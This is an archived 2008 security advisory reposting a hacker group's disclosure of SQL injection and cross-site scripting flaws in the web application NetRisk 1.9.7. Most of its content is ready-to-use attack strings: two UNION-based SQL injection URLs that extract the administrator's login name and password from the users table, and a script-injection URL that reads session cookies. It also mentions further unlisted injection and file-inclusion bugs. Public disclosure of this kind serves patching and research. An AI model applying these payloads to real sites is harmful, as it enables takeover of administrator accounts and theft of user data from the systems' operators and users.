netrisk 1.9.7 Multiple Remote Vulnerabilities (sql injection/xss)

2008-01-08T00:00:00
ID SECURITYVULNS:DOC:18809
Type securityvulns
Reporter Securityvulns
Modified 2008-01-08T00:00:00

Description


#################################################################### # # # ...:::::netrisk 1.9.7 Multiple Remote Vulnerabilities::::.... # # (sql injection/xss) #
####################################################################

Virangar Security Team

www.virangar.org www.virangar.net


Discoverd By : virangar security team (hadihadi)


special tnx to:MR.nosrati,black.shadowes,MR.hesy,satan,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004

vlues:

1.sql injection: get admin login name: http://site.com/patch/index.php?page=profile&pid=-1//union//select//1,2,login,4,5,6,7,8,9,10,11//from//users//where/*/id=1/


get admin pass: http://site.com/patch/index.php?page=profile&pid=-1//union//select//1,2,pass,4,5,6,7,8,9,10,11//from//users//where/*/id=1/

2.xss: http://site.com/patch/index.php?page=<script>alert(document.cookie)</script>

NetRisk contains of other sql injecton/xss/LFI bugs in other pages ;)